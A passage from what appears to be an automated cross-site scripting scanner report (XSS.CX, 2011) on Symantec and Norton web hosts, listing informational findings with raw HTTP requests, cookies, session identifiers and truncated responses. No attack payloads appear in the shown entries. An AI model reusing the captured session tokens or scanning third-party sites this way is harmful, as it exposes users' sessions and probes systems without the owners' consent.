HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:37 GMT Content-Length: 10076 Last-Modified: Mon, 13 Sep 2010 21:57:06 GMT Accept-Ranges: bytes function showHelp(thisitem){var divname="help"+thisitem;var thediv=document.getElementById(divname);thediv.style.visibility='visible';} function hideHelp(thisitem){var divname="help"+thisitem;var the...[SNIP]...
24.13. https://renewals.symantec.com/renewals/js/s_2_code_symc_cust_prod.js
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/js/s_2_code_symc_cust_prod.js
Request
GET /renewals/js/s_2_code_symc_cust_prod.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:36 GMT Content-Length: 28910 Last-Modified: Wed, 28 Apr 2010 02:37:02 GMT Accept-Ranges: bytes /* SiteCatalyst code version: H.21. Copyright 1996-2010 Adobe, Inc. All Rights Reserved More info available at http://www.omniture.com */ /************************ ADDITIONAL FEATURES *************...[SNIP]...
24.14. https://renewals.symantec.com/renewals/js/symantec_omniture/mysymc_code_util.js
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/js/symantec_omniture/mysymc_code_util.js
Request
GET /renewals/js/symantec_omniture/mysymc_code_util.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:36 GMT Content-Length: 8321 Last-Modified: Thu, 18 Mar 2010 01:42:32 GMT Accept-Ranges: bytes var countryDetails=new Array();var language=new Array();var RegionArray=new Array();var questionSet="";var pageNumber=0;var samChannel=null;var jsChannel=null;var tabNames=new Array();var subTabName...[SNIP]...
24.15. https://renewals.symantec.com/renewals/js/symantec_omniture/s_code_20100217.js
Summary
Severity: Information
Confidence: Certain
Host: https://renewals.symantec.com
Path: /renewals/js/symantec_omniture/s_code_20100217.js
Request
GET /renewals/js/symantec_omniture/s_code_20100217.js HTTP/1.1 Host: renewals.symantec.com Connection: keep-alive Referer: https://renewals.symantec.com/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621903651-New%7C1336357903651%3B%20event69%3Devent69%7C1336357903652%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/8; JSESSIONID=L9pmTqFWjzHv2V21JQT7v8CfZlMK3Ry0HG4TNv2SJXLVJpDMpWc1!210426435
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:31:37 GMT Content-Length: 30123 Last-Modified: Wed, 28 Apr 2010 02:37:02 GMT Accept-Ranges: bytes /* SiteCatalyst code version: H.20.3. Copyright 1997-2009 Omniture, Inc. More info available at http://www.omniture.com */ /* Rainmaker changes to set the report suite. */ if (location.href.inde...[SNIP]...
24.16. http://us.norton.com/www-uat.ges.sym
Summary
Severity: Information
Confidence: Certain
Host: http://us.norton.com
Path: /www-uat.ges.sym
Request
GET /www-uat.ges.sym HTTP/1.1 Host: us.norton.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Sun-Java-System-Web-Server/7.0 Content-Length: 22137 Cache-Control: public, max-age=21587 Date: Fri, 09 Sep 2011 21:47:29 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Error: Page Not Found - Symantec Corp.</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="Content-Language" content="en-US"/>...[SNIP]...
24.17. https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/close_on.gif/
Summary
Severity: Information
Confidence: Certain
Host: https://www-secure.symantec.com
Path: /content/en/us/enterprise/images/liveperson/invite10/close_on.gif/
Request
GET /content/en/us/enterprise/images/liveperson/invite10/close_on.gif/ HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Sun-Java-System-Web-Server/7.0 Content-Length: 22137 Cache-Control: public, max-age=1800 Date: Fri, 09 Sep 2011 21:47:33 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Error: Page Not Found - Symantec Corp.</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="Content-Language" content="en-US"/>...[SNIP]...
24.18. https://www-secure.symantec.com/content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/
Summary
Severity: Information
Confidence: Certain
Host: https://www-secure.symantec.com
Path: /content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/
Request
GET /content/en/us/enterprise/images/liveperson/invite10/need_help_on.gif/ HTTP/1.1 Host: www-secure.symantec.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Sun-Java-System-Web-Server/7.0 Content-Length: 22137 Cache-Control: public, max-age=1800 Date: Fri, 09 Sep 2011 21:47:33 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Error: Page Not Found - Symantec Corp.</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="Content-Language" content="en-US"/>...[SNIP]...
24.19. http://www.symantec.com/business/verisign/fraud-detection-service
Summary
Severity: Information
Confidence: Certain
Host: http://www.symantec.com
Path: /business/verisign/fraud-detection-service
Request
GET /business/verisign/fraud-detection-service?tid=gnps HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621646660-New%7C1336357646660%3B%20event69%3Devent69%7C1336357646662%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/4
Response
HTTP/1.1 404 Not Found Server: Sun-Java-System-Web-Server/7.0 Content-Length: 22137 Cache-Control: public, max-age=3600 Date: Fri, 09 Sep 2011 21:30:49 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Error: Page Not Found - Symantec Corp.</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="Content-Language" content="en-US"/>...[SNIP]...
Report generated by XSS.CX at Sat Sep 10 00:40:28 GMT-06:00 2011.